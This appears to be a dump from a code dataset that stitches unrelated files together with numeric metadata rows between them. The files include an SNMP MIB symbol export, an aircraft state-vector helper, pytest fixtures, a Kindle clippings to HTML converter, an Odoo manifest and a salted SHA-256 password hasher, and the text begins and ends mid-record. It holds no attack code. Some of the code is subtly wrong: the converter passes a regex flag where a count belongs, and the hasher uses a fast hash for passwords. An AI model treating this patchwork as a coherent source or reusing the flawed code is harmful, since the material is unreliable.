') mibBuilder.exportSymbols("FORCE10-MONITORING-MIB", f10CpuIngUnicastYellowMin=f10CpuIngUnicastYellowMin, f10EgMulticastBytesCount=f10EgMulticastBytesCount, f10OutQueueStatisticsTable=f10OutQueueStatisticsTable, f10MacAccBytes=f10MacAccBytes, f10InQueueCycloneVersion=f10InQueueCycloneVersion, f10IngUnicastQueueId=f10IngUnicastQueueId, f10MacAccPackets=f10MacAccPackets, f10CpuIngUnicastSrcCard=f10CpuIngUnicastSrcCard, f10WredYellowThresholdLow=f10WredYellowThresholdLow, f10WredStatisticsEntry=f10WredStatisticsEntry, f10CpuIngUnicastPacketCount=f10CpuIngUnicastPacketCount, f10WredRedName=f10WredRedName, f10IngMulticastCycloneVersion=f10IngMulticastCycloneVersion, f10EgMulticastRedDrop=f10EgMulticastRedDrop, f10EgQueueMulticastStatEntry=f10EgQueueMulticastStatEntry, f10WredGreenThresholdLow=f10WredGreenThresholdLow, f10EgMulticastCycloneVersion=f10EgMulticastCycloneVersion, f10InQueueMatchBytes=f10InQueueMatchBytes, f10EgMulticastYellowMax=f10EgMulticastYellowMax, f10MonQueueGroup=f10MonQueueGroup, f10OutQueueBytes=f10OutQueueBytes, f10EgUnicastBytes=f10EgUnicastBytes, f10IngUnicastSrcCard=f10IngUnicastSrcCard, f10ArpStatistic=f10ArpStatistic, f10InQueueBytesCount=f10InQueueBytesCount, f10EgUnicastCycloneVersion=f10EgUnicastCycloneVersion, f10EgMulticastPacketCount=f10EgMulticastPacketCount, f10OutQueueStatisticsEntry=f10OutQueueStatisticsEntry, f10CpuIngUnicastGreenDrop=f10CpuIngUnicastGreenDrop, f10IngMulticastYellowMax=f10IngMulticastYellowMax, f10IngQueueMulticastStatTable=f10IngQueueMulticastStatTable, f10BcastPktRecv=f10BcastPktRecv, f10CpuIngQueueUnicastStatEntry=f10CpuIngQueueUnicastStatEntry, f10EgUnicastGreenMax=f10EgUnicastGreenMax, f10IngMulticastYellowMin=f10IngMulticastYellowMin, f10InQueueMatchBps=f10InQueueMatchBps, f10InQueueStatisticsEntry=f10InQueueStatisticsEntry, f10CpuIngUnicastGreenMax=f10CpuIngUnicastGreenMax, f10WredRedReserve1=f10WredRedReserve1, f10WredRedReserve2=f10WredRedReserve2, f10IngMulticastQueueId=f10IngMulticastQueueId, 
f10EgMulticastYellowDrop=f10EgMulticastYellowDrop, f10InQueueDropPackets=f10InQueueDropPackets, f10OutQueuePackets=f10OutQueuePackets, f10IngUnicastYellowMax=f10IngUnicastYellowMax, f10EgQueueMulticastStatTable=f10EgQueueMulticastStatTable, f10CpuIngUnicastSrcPortPipe=f10CpuIngUnicastSrcPortPipe, f10CpuIngUnicastBytesCount=f10CpuIngUnicastBytesCount, f10InQueuePktsCount=f10InQueuePktsCount, f10IngMulticastSrcPortPipe=f10IngMulticastSrcPortPipe, f10EgUnicastPacketCount=f10EgUnicastPacketCount, f10IngMulticastGreenMin=f10IngMulticastGreenMin, f10EgQueueUnicastStatEntry=f10EgQueueUnicastStatEntry, f10CpuIngUnicastQueueId=f10CpuIngUnicastQueueId, f10MonQueue=f10MonQueue, f10EgMulticastGreenDrop=f10EgMulticastGreenDrop, f10IngUnicastGreenMin=f10IngUnicastGreenMin, f10IngQueueUnicastStatEntry=f10IngQueueUnicastStatEntry, f10IngMulticastBytesCount=f10IngMulticastBytesCount, f10OutQueueBps=f10OutQueueBps, f10IngMulticastSrcCard=f10IngMulticastSrcCard, f10WredYellowName=f10WredYellowName, f10MonMac=f10MonMac, f10WredYellowReserve1=f10WredYellowReserve1, f10InQueueBytes=f10InQueueBytes, f10MonMibVersion=f10MonMibVersion, f10ArpProxySent=f10ArpProxySent, f10ArpReplySent=f10ArpReplySent, f10MacAccOutIfIndex=f10MacAccOutIfIndex, f10BcastPktSent=f10BcastPktSent, f10IngUnicastCycloneVersion=f10IngUnicastCycloneVersion, f10EgUnicastRedDrop=f10EgUnicastRedDrop, f10InQueueStatisticsTable=f10InQueueStatisticsTable, f10WredStatisticsTable=f10WredStatisticsTable, f10OutQueueBytesCount=f10OutQueueBytesCount, f10IngUnicastBytes=f10IngUnicastBytes, f10CpuIngQueueUnicastStatTable=f10CpuIngQueueUnicastStatTable, f10CpuIngUnicastRedDrop=f10CpuIngUnicastRedDrop, f10IngUnicastYellowMin=f10IngUnicastYellowMin, f10InQueueId=f10InQueueId, f10MacAccounting=f10MacAccounting, f10MonIfQueueGroup=f10MonIfQueueGroup, f10ArpReqRecv=f10ArpReqRecv, f10IngMulticastPacketCount=f10IngMulticastPacketCount, f10IngUnicastGreenMax=f10IngUnicastGreenMax, f10IngMulticastYellowDrop=f10IngMulticastYellowDrop, 
PYSNMP_MODULE_ID=f10MonitoringMib, f10IngMulticastBytes=f10IngMulticastBytes, f10MonMaxQueue=f10MonMaxQueue, f10CpuIngUnicastDestCpu=f10CpuIngUnicastDestCpu, f10WredGreenName=f10WredGreenName, f10CpuIngUnicastYellowDrop=f10CpuIngUnicastYellowDrop, f10CpuIngUnicastGreenMin=f10CpuIngUnicastGreenMin, f10EgMulticastYellowMin=f10EgMulticastYellowMin, f10MonIfQueue=f10MonIfQueue, f10WredRedThresholdHigh=f10WredRedThresholdHigh, f10IngUnicastGreenDrop=f10IngUnicastGreenDrop, f10EgUnicastYellowMax=f10EgUnicastYellowMax, f10EgQueueUnicastStatTable=f10EgQueueUnicastStatTable, f10MacAccountingDestEntry=f10MacAccountingDestEntry, f10WredGreenDropPackets=f10WredGreenDropPackets, f10CpuIngUnicastYellowMax=f10CpuIngUnicastYellowMax, f10WredYellowReserve2=f10WredYellowReserve2, f10EgUnicastYellowDrop=f10EgUnicastYellowDrop, f10MacAccMacAddr=f10MacAccMacAddr, f10MacAccInIfIndex=f10MacAccInIfIndex, f10IpStatistic=f10IpStatistic, f10WredGreenThresholdHigh=f10WredGreenThresholdHigh, f10IngUnicastSrcPortPipe=f10IngUnicastSrcPortPipe, f10McastPktSent=f10McastPktSent, f10EgMulticastGreenMin=f10EgMulticastGreenMin, f10MonitoringMib=f10MonitoringMib, f10MonGroup=f10MonGroup, f10IngUnicastDestCard=f10IngUnicastDestCard, f10IngUnicastDestPortPipe=f10IngUnicastDestPortPipe, f10IngMulticastRedDrop=f10IngMulticastRedDrop, f10EgUnicastYellowMin=f10EgUnicastYellowMin, f10MacGroup=f10MacGroup, f10IngMulticastGreenDrop=f10IngMulticastGreenDrop, f10WredYellowDropPackets=f10WredYellowDropPackets, f10IngUnicastRedDrop=f10IngUnicastRedDrop, f10NetworkStat=f10NetworkStat, f10EgMulticastGreenMax=f10EgMulticastGreenMax, f10EgMulticastBytes=f10EgMulticastBytes, f10WredGreenReserve1=f10WredGreenReserve1, f10IngUnicastYellowDrop=f10IngUnicastYellowDrop, f10ArpReqSent=f10ArpReqSent, f10IngQueueUnicastStatTable=f10IngQueueUnicastStatTable, f10ArpReplyRecv=f10ArpReplyRecv, f10EgMulticastQueueId=f10EgMulticastQueueId, f10WredQueueId=f10WredQueueId, f10IngUnicastBytesCount=f10IngUnicastBytesCount, 
f10CpuIngUnicastCycloneVersion=f10CpuIngUnicastCycloneVersion, f10WredYellowThresholdHigh=f10WredYellowThresholdHigh, f10McastPktRecv=f10McastPktRecv, f10EgUnicastGreenMin=f10EgUnicastGreenMin, f10OutQueueId=f10OutQueueId, f10IngQueueMulticastStatEntry=f10IngQueueMulticastStatEntry, f10WredGreenReserve2=f10WredGreenReserve2, f10EgUnicastGreenDrop=f10EgUnicastGreenDrop, f10IngMulticastGreenMax=f10IngMulticastGreenMax, f10InQueueMatchPackets=f10InQueueMatchPackets, f10EgUnicastQueueId=f10EgUnicastQueueId, f10OutQueueCycloneVersion=f10OutQueueCycloneVersion, f10WredRedDropPackets=f10WredRedDropPackets, f10MacAccVlan=f10MacAccVlan, f10MacAccountingDestTable=f10MacAccountingDestTable, f10WredRedThresholdLow=f10WredRedThresholdLow, f10EgUnicastBytesCount=f10EgUnicastBytesCount, f10IngUnicastPacketCount=f10IngUnicastPacketCount)
131.044543
6,796
0.791261
6,857
58,839
6.789412
0.062418
0.071915
0.125851
0.012802
0.575298
0.4389
0.391752
0.38084
0.311116
0.282719
0
0.085852
0.095906
58,839
448
6,797
131.337054
0.789307
0.005744
0
0
0
0.138636
0.279748
0.013882
0
0
0
0
0
1
0
false
0.029545
0.020455
0
0.020455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
056887fff4c016e1bd810fe62a7c889a8d65cc5e
1,952
py
Python
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py
AlejandroRios/IAANDOCAC-aircraft-framework
9768e9736af70e20e8ef1cc0ad6501f3a28dbb47
[ "Apache-2.0" ]
null
null
null
""" Function : Title : Written by: Email : aarc.88@gmail.com Date : Last edit : Language : Python 3.8 or > Aeronautical Institute of Technology - Airbus Brazil Description: - Inputs: - Outputs: - TODO's: - """ # ============================================================================= # IMPORTS # ============================================================================= import numpy as np # ============================================================================= # CLASSES # ============================================================================= # ============================================================================= # FUNCTIONS # ============================================================================= def state_vector(x, trim_par): X = np.zeros((12, 1)) X[0] = x[0] # V X[1] = x[1] # alpha X[2] = x[2] # q X[3] = x[3] # theta X[4] = trim_par['H_m'] # H X[6] = x[4] # beta X[7] = x[5] # phi X[8] = x[6] # p X[9] = x[7] # r X[10] = x[8] # r return X # ============================================================================= # MAIN # ============================================================================= # ============================================================================= # TEST # ============================================================================= # x = [68.0588, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0, # 0] # trim_par = {} # trim_par = {'V':68.0588, # 'H_m':10000, # 'chi_deg':0, # 'gamma_deg':0, # 'phi_dot_deg_s':0, # 'theta_dot_deg':0, # 'psi_dot_deg_s':0, # 'beta_deg_eq':0, # 'W':[0, 0, 0]} # X = state_vector(x, trim_par) # print(X)
22.436782
79
0.236168
164
1,952
2.682927
0.463415
0.063636
0.081818
0.090909
0.115909
0.029545
0.029545
0.029545
0.029545
0.029545
0
0.04577
0.26127
1,952
86
80
22.697674
0.259362
0.798668
0
0
0
0
0.008982
0
0
0
0
0.011628
0
1
0.071429
false
0
0.071429
0
0.214286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
057cd72af1308e0a81b1f8fd12ba9d1678f47b2d
1,262
py
Python
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
176
2017-01-30T16:21:48.000Z
2022-02-10T05:32:57.000Z
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
49
2017-01-21T20:27:03.000Z
2022-01-16T02:57:51.000Z
tests/fixtures.py
GustavoKatel/pushbullet-cli
e5102772752a97db539594b0d50b5effb36a22e2
[ "MIT" ]
21
2017-01-26T06:08:54.000Z
2022-01-04T19:53:25.000Z
import click
import pytest
from click.testing import CliRunner


# NOTE: pytest.yield_fixture is deprecated (removed in pytest 6.2);
# a plain @pytest.fixture supports yield-style fixtures.
@pytest.fixture
def pb_api(mocker):
    """Yield a MockPushBullet patched in as the app's PushBullet client."""
    from pushbullet_cli import app
    from tests.mock_pushbullet import MockPushBullet

    mock_pb = MockPushBullet()
    mocker.patch.object(app, "_get_pb", return_value=mock_pb)
    yield mock_pb


@pytest.fixture
def runner(pb_api):
    """Provide a Click CLI runner (depends on pb_api so the API is mocked)."""
    runner = CliRunner()
    return runner


def wrap_runner_func(runner, func):
    """Return an ``invoke`` helper bound to ``runner`` and command ``func``.

    The helper invokes the command, optionally re-raises any captured
    exception and asserts a zero exit code, then returns the result.
    """

    def invoke(arg_list=None, should_raise=True, **kwargs):
        # BUG FIX: the default was a mutable list ([]) shared across calls;
        # use a None sentinel instead.
        if arg_list is None:
            arg_list = []
        result = runner.invoke(func, arg_list, **kwargs)
        if should_raise:
            if result.exception is not None:
                raise result.exception
            assert result.exit_code == 0
        return result

    return invoke


@pytest.fixture
def push(runner):
    from pushbullet_cli.app import push

    return wrap_runner_func(runner, push)


@pytest.fixture
def list_devices(runner):
    from pushbullet_cli.app import list_devices

    return wrap_runner_func(runner, list_devices)


@pytest.fixture
def list_pushes(runner):
    from pushbullet_cli.app import list_pushes

    return wrap_runner_func(runner, list_pushes)


@pytest.fixture
def set_key(runner):
    from pushbullet_cli.app import set_key

    return wrap_runner_func(runner, set_key)
21.033333
61
0.723455
172
1,262
5.081395
0.27907
0.06865
0.097254
0.114416
0.283753
0.224256
0.08238
0
0
0
0
0.000994
0.202853
1,262
59
62
21.389831
0.867793
0
0
0.128205
0
0
0.005547
0
0
0
0
0
0.025641
1
0.205128
false
0
0.230769
0
0.615385
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
0582a1028ca60869856e20d167bdffc0aa95e128
412
py
Python
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
13
2019-10-01T02:51:27.000Z
2022-02-28T17:38:58.000Z
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
2
2020-11-09T09:17:21.000Z
2021-04-27T21:20:59.000Z
pal95_doc/docs/__init__.py
MacHu-GWU/pal95_doc-project
753b865435f316e985320247489e68f465741827
[ "MIT" ]
1
2020-02-28T12:05:22.000Z
2020-02-28T12:05:22.000Z
# -*- coding: utf-8 -*-
"""Aggregate the per-topic lookup tables into a single ``doc_data`` mapping."""
from .equipment import lt_equipment
from .spell import lt_spell_lxy, lt_spell_zle, lt_spell_lyr, lt_spell_an
from .monster import lt_monster
from .zone import lt_zone

# Same keys and values as before, written as a dict literal instead of dict().
doc_data = {
    "lt_equipment": lt_equipment,
    "lt_spell_lxy": lt_spell_lxy,
    "lt_spell_zle": lt_spell_zle,
    "lt_spell_lyr": lt_spell_lyr,
    "lt_spell_an": lt_spell_an,
    "lt_monster": lt_monster,
    "lt_zone": lt_zone,
}
25.75
72
0.764563
72
412
3.902778
0.236111
0.298932
0.106762
0.128114
0.384342
0.348754
0.298932
0.298932
0
0
0
0.002874
0.15534
412
16
73
25.75
0.804598
0.050971
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.307692
0
0.307692
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
0597da213baf4860aef1103fe9f6eaf312ad6be5
9,246
py
Python
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
1
2020-05-25T11:30:54.000Z
2020-05-25T11:30:54.000Z
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
null
null
null
Klipps/convert.py
rafalkaron/KindleClippingsBeautifier
10d79da2a073f8867041a2520d7a234937237243
[ "MIT" ]
null
null
null
# coding: utf-8
"""Convert a Kindle \"My Clippings.txt\" export into a standalone HTML page."""
import re
import datetime

__author__ = "Rafał Karoń <rafalkaron@gmail.com>"


def clipps_str_to_html_str(clipps_str):
    """Return a string that contains the converted \"Kindle Clippings.txt file\" to HTML."""
    # ADD ELEMENTS (SVG favicon encoded with: https://yoksel.github.io/url-encoder/)
    pre_elements = r"""<!DOCTYPE html>
<html>
<head>
<title>Kindle Clippings</title>
<meta charset="utf-8">
<link href="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8' standalone='no'%3F%3E%3C!-- Created with Inkscape (http://www.inkscape.org/) --%3E%3Csvg xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:cc='http://creativecommons.org/ns%23' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns%23' xmlns:svg='http://www.w3.org/2000/svg' xmlns='http://www.w3.org/2000/svg' xmlns:sodipodi='http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd' xmlns:inkscape='http://www.inkscape.org/namespaces/inkscape' width='1000' height='1000' viewBox='0 0 264.58335 264.58335' version='1.1' id='svg8' inkscape:version='0.92.4 (5da689c313, 2019-01-14)' sodipodi:docname='klipps3.svg' inkscape:export-filename='C:%5CUsers%5Crafal%5CDesktop%5Cklipps3.png' inkscape:export-xdpi='72.000008' inkscape:export-ydpi='72.000008'%3E%3Ctitle id='title3713'%3EKlipps%3C/title%3E%3Cdefs id='defs2' /%3E%3Csodipodi:namedview id='base' pagecolor='%23515151' bordercolor='%23000000' borderopacity='1' inkscape:pageopacity='0.20784314' inkscape:pageshadow='2' inkscape:zoom='0.25' inkscape:cx='30.072603' inkscape:cy='582.33116' inkscape:document-units='px' inkscape:current-layer='layer1' showgrid='false' inkscape:window-width='1842' inkscape:window-height='1057' inkscape:window-x='70' inkscape:window-y='-8' inkscape:window-maximized='1' units='px' inkscape:showpageshadow='false' showborder='true' inkscape:pagecheckerboard='false' showguides='true' inkscape:guide-bbox='true'%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0,1' id='guide3724' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='1,0' id='guide3726' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='79.375005,79.375005' orientation='-0.70710678,0.70710678' id='guide3748' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='132.29167,132.29167' orientation='0.70710678,0.70710678' id='guide3750' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458327,150.45027' orientation='-0.70710678,0.70710678' id='guide3776' inkscape:locked='false' /%3E%3Csodipodi:guide position='150.45027,26.458323' orientation='-0.70710678,0.70710678' id='guide3778' inkscape:locked='false' /%3E%3Csodipodi:guide position='114.13307,238.12501' orientation='0.70710678,0.70710678' id='guide3780' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='26.458335,150.45028' orientation='0.70710678,0.70710678' id='guide3782' inkscape:locked='false' inkscape:label='' inkscape:color='rgb(0,0,255)' /%3E%3Csodipodi:guide position='150.45028,26.458334' orientation='1,0' id='guide3801' inkscape:locked='false' /%3E%3Csodipodi:guide position='238.12501,114.13307' orientation='0,1' id='guide3803' inkscape:locked='false' /%3E%3Csodipodi:guide position='132.29167,114.13307' orientation='-0.70710678,0.70710678' id='guide3806' inkscape:locked='false' /%3E%3Csodipodi:guide position='26.458336,150.45028' orientation='0,1' id='guide3826' inkscape:locked='false' /%3E%3C/sodipodi:namedview%3E%3Cmetadata id='metadata5'%3E%3Crdf:RDF%3E%3Ccc:Work rdf:about=''%3E%3Cdc:format%3Eimage/svg+xml%3C/dc:format%3E%3Cdc:type rdf:resource='http://purl.org/dc/dcmitype/StillImage' /%3E%3Cdc:title%3EKlipps%3C/dc:title%3E%3Cdc:creator%3E%3Ccc:Agent%3E%3Cdc:title%3ERafał Karoń%3C/dc:title%3E%3C/cc:Agent%3E%3C/dc:creator%3E%3C/cc:Work%3E%3C/rdf:RDF%3E%3C/metadata%3E%3Cg inkscape:groupmode='layer' id='layer3' inkscape:label='Background' /%3E%3Cg inkscape:groupmode='layer' id='layer2' inkscape:label='Filling'%3E%3Ccircle style='fill:%23ffffff;stroke-width:0.22826612' id='path3736-9' cx='132.29167' cy='132.29169' r='114.13306' /%3E%3C/g%3E%3Cg inkscape:label='Icon' inkscape:groupmode='layer' id='layer1' transform='translate(0,-32.416632)'%3E%3Cpath style='fill:%23e63946;stroke-width:1.32083833;fill-opacity:1' d='M 431.36914 100 L 100 431.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 431.36914 100 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770' /%3E%3Cpath style='fill:%231d3557;fill-opacity:1;stroke-width:1.32083833' d='M 500 500 L 500 831.36914 L 568.63086 900 L 568.63086 568.63086 L 900 568.63086 L 831.36914 500 L 500 500 z ' transform='matrix(0.26458335,0,0,0.26458335,0,32.416632)' id='rect3770-4' /%3E%3C/g%3E%3C/svg%3E%0A" rel='icon' type='image/svg'/>
</head>
<body>"""
    heading = "<h1>Kindle Clippings</h1>\n<h2>"
    footer = f"<footer>Generated on {datetime.datetime.now().strftime('%B %d, %Y')} at {datetime.datetime.now().strftime('%I:%M %p')} with <a target=\"_blank\" href=\"https://github.com/rafalkaron/Klipps\">Klipps</a></footer>"
    post_elements = "</body>\n</html>"
    html_str = "\n".join((pre_elements, heading, clipps_str, footer, post_elements))

    # SEARCH AND REPLACE
    html_str = re.sub(r"\n\n", "\n", html_str)  # Removes empty lines
    html_str = re.sub(r"==========", "<div class=\"entry\">\n<h2>", html_str)  # Replaces Kindle entries markup with the "entry" class and opens headers 2
    html_str = re.sub(r"- .* \| ", "###timestamp### ", html_str)  # Removes redundant information from timestamps and adds a tag that is used to optimize RE in the next lines
    for added_on in re.findall(r"^###timestamp### .*", html_str, re.MULTILINE):  # Shortens and wraps timestamps || MAKE THIS GENERIC FOR OTHER LANGUAGES
        added_on_new = re.sub(r"###timestamp###", "", added_on)  # Removes the ###timestamp### tag
        # BUG FIX: re.MULTILINE was previously passed positionally, landing in
        # re.sub's ``count`` parameter instead of ``flags``; pass it by keyword.
        added_on_new = re.sub(r":\d\d$", "", added_on_new, flags=re.MULTILINE)  # [Optional] Removes seconds in 24h timestamps
        added_on_new = re.sub(r":\d\d PM$", " PM", added_on_new, flags=re.MULTILINE)  # [Optional] Removes seconds in 12h PM timestamps
        added_on_new = re.sub(r":\d\d AM$", " AM", added_on_new, flags=re.MULTILINE)  # [Optional] Removes seconds in 12h AM timestamps
        added_on_new = re.sub(r"^ Added on ", "", added_on_new)  # [Optional] Removes the "Added on" timestamp text
        added_on_new = f"<div class=\"timestamp\">{added_on_new}</div>\n<blockquote>"  # Wraps timestamps in timestamp divs and opens a blockquote
        # BUG FIX: the matched line was previously reused verbatim as a regex
        # pattern (re.sub(added_on, ...)), which breaks when the text contains
        # regex metacharacters; plain substring replacement is what's intended.
        html_str = html_str.replace(added_on, added_on_new)
    html_str = re.sub(r"<div class=\"timestamp\">", "</h2>\n<div class=\"timestamp\">", html_str)  # Closes headers 2 before timestamps
    html_str = re.sub(r"<div class=\"entry\">\n<h2>\n<footer>", "</blockquote>\n</div>\n<footer>", html_str)  # Removes redundant entry divs and headers 2 before the footer
    html_str = re.sub("<div class=\"entry\">\n<h2>", "</blockquote>\n</div>\n<div class=\"entry\">\n<h2>", html_str)  # Closes blockquote and entry div before opening another entry div
    html_str = re.sub(r"</h1>\n<h2>", "</h1>\n<div class=\"entry\">\n<h2>", html_str)  # Opens the first element div after
    return html_str


def default_style_html_str(html_str):
    """Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a default embedded CSS style."""
    html_str = re.sub("<h1>", "<div class=\"frontpage\"><h1>", html_str)
    html_str = re.sub("</h1>", "</h1>\n<div class=\"generator\"><p>Generated with Klipps</p></div>\n</div>", html_str)
    html_str = re.sub("/>\n</head>", """/>
<style>
*{
    font-family: Helvetica, Arial, sans-serif;
    font-size: 100%;
    margin: 0px;
}
.frontpage{
    background-color: #1D3557;
    height: 100vh;
}
h1{
    font-size: 10vw;
    text-align: center;
    padding-top: 15vh;
    padding-bottom: 20vh;
    padding-left: 1vh;
    padding-right: 1vh;
    color: #F1FAEE;
}
.generator{
    font-size: 3vw;
    text-align: center;
    color: #F1FAEE;
}
.entry{
    padding: 4rem 8vw 4rem 8vw;
}
.entry:nth-child(odd){
    background: #F1FAEE;
}
.entry:nth-child(even){
    background: rgb(228, 235, 226);
}
h2{
    font-size: 2.6rem;
    color: #1D3557;
}
.timestamp{
    font-size: 1.2rem;
    font-weight: bold;
    padding-bottom: 1rem;
    color: #1D3557;
}
blockquote{
    font-size: 1.5rem;
    text-align: justify;
    color: #1D3557;
}
footer{
    font-size: 1.5rem;
    padding: 2rem 1rem 2rem 1rem;
    background-color: #1D3557;
    color: #F1FAEE;
    text-align: center;
}
a{
    color: #E63946;
    font-weight: bolder;
    text-decoration: none;
}
</style>
</head>""", html_str)
    return html_str


def custom_style_html_str(css_filepath, html_str):
    """Return a string that contains the \"Kindle Clippings.txt file\" converted to HTML with a custom embedded CSS style."""
    # Imported lazily so the pure string converters above remain usable
    # without the package's feed module.
    from .feed import read_file

    style = read_file(css_filepath)
    html_str = re.sub("/>\n</head>", f"/>\n<style>\n{style}\n</style>\n</head>", html_str)
    return html_str
72.234375
4,532
0.701709
1,429
9,246
4.482155
0.271519
0.037158
0.018267
0.046838
0.343169
0.314442
0.251678
0.196565
0.186261
0.170492
0
0.130032
0.113346
9,246
128
4,533
72.234375
0.651256
0.125784
0
0.153846
0
0.019231
0.802488
0.399502
0
0
0
0
0
1
0.028846
false
0
0.028846
0
0.086538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55333cbb250a399b054018a193b9449274e24d7c
837
py
Python
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
1
2020-03-01T03:04:21.000Z
2020-03-01T03:04:21.000Z
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
null
null
null
website_sale_cache/__manifest__.py
factorlibre/website-addons
9a0c7a238e2b6030d57f7a08d48816b4f2431524
[ "MIT" ]
3
2019-07-29T20:23:16.000Z
2021-01-07T20:51:24.000Z
# Copyright 2017 Artyom Losev # Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr> # License MIT (https://opensource.org/licenses/MIT). { "name": """E-commerce Category Cache""", "summary": """Use this module to greatly accelerate the loading of a page with a large number of product categories""", "category": "Website", "images": ["images/websale_cache.png"], "version": "13.0.1.0.1", "author": "IT-Projects LLC, Artyom Losev", "support": "apps@itpp.dev", "website": "https://www.it-projects.info", "license": "Other OSI approved licence", # MIT "price": 25.00, "currency": "EUR", "depends": ["website_sale", "website", "base_action_rule"], "data": ["views.xml", "data/ir_action_server.xml", "data/base_action_rules.xml"], "installable": False, }
41.85
123
0.658303
107
837
5.074766
0.719626
0.055249
0.051565
0
0
0
0
0
0
0
0
0.025568
0.158901
837
19
124
44.052632
0.745739
0.195938
0
0
0
0
0.681138
0.112275
0
0
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
554e5d74e0feb6600546ab4240369b860c3f874d
492
py
Python
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
chhschou/sandpit
d4a6760905b45b90455f10a5b50af3c5f743e445
[ "MIT" ]
null
null
null
import random
import string
import hashlib


def make_salt():
    """Return a random 5-letter ASCII salt."""
    # BUG FIX: string.letters and xrange are Python-2-only names;
    # string.ascii_letters and range behave the same on both 2 and 3.
    return ''.join(random.choice(string.ascii_letters) for _ in range(5))


# Implement the function valid_pw() that returns True if a user's password
# matches its hash. You will need to modify make_pw_hash.
def make_pw_hash_with_salt(name, pw, salt):
    """Return 'hexdigest|salt' where hexdigest = sha256(name + pw + salt)."""
    # BUG FIX: hashlib.sha256 requires bytes on Python 3; encode explicitly.
    # NOTE: sha256 is a fast hash — fine for this exercise, but real password
    # storage should use a slow KDF (bcrypt/scrypt/PBKDF2).
    h = hashlib.sha256((name + pw + salt).encode('utf-8')).hexdigest()
    return '%s|%s' % (h, salt)


def make_pw_hash(name, pw):
    """Return a salted hash for (name, pw) using a fresh random salt."""
    s = make_salt()
    return make_pw_hash_with_salt(name, pw, s)
23.428571
74
0.707317
83
492
4.012048
0.506024
0.072072
0.12012
0.078078
0.144144
0.144144
0.144144
0
0
0
0
0.009926
0.180894
492
20
75
24.6
0.816377
0.260163
0
0
0
0
0.01385
0
0
0
0
0
0
1
0.272727
false
0
0.272727
0.090909
0.818182
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
55813ead580a9fd9024544a5265e546eab6feb28
3,339
py
Python
mysite/mysite/settings.py
prnake/search_engine_demo
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
3
2020-08-08T04:44:29.000Z
2020-09-10T07:38:11.000Z
mysite/mysite/settings.py
prnake/search_engine_demo
